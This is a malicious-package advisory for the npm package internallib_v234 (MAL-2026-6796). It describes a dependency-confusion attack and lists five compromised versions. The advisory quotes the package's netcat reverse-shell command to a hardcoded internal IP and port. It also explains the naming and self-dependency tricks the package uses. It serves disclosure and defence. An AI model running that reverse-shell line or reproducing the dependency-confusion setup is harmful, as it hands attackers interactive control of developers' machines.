VYPR

npm · Malicious package advisory

Malware

internallib_v234

MAL-2026-6796

Malicious code in internallib_v234 (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087)
internallib_v234@1.0.6 exports a `command()` function whose body unconditionally invokes `/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (`internallib_v234: ^1.0.0`), and CI configuration references a private Verdaccio registry (`npm update --registry http://0.0.0.0:4873/`). The combination indicates a targeted attack against an organization that hosts a private `internallib_v234` internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.

Compromised versions (5)

  • 1.0.3
  • 1.0.5
  • 1.0.6
  • 1.0.7
  • 1.0.4

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.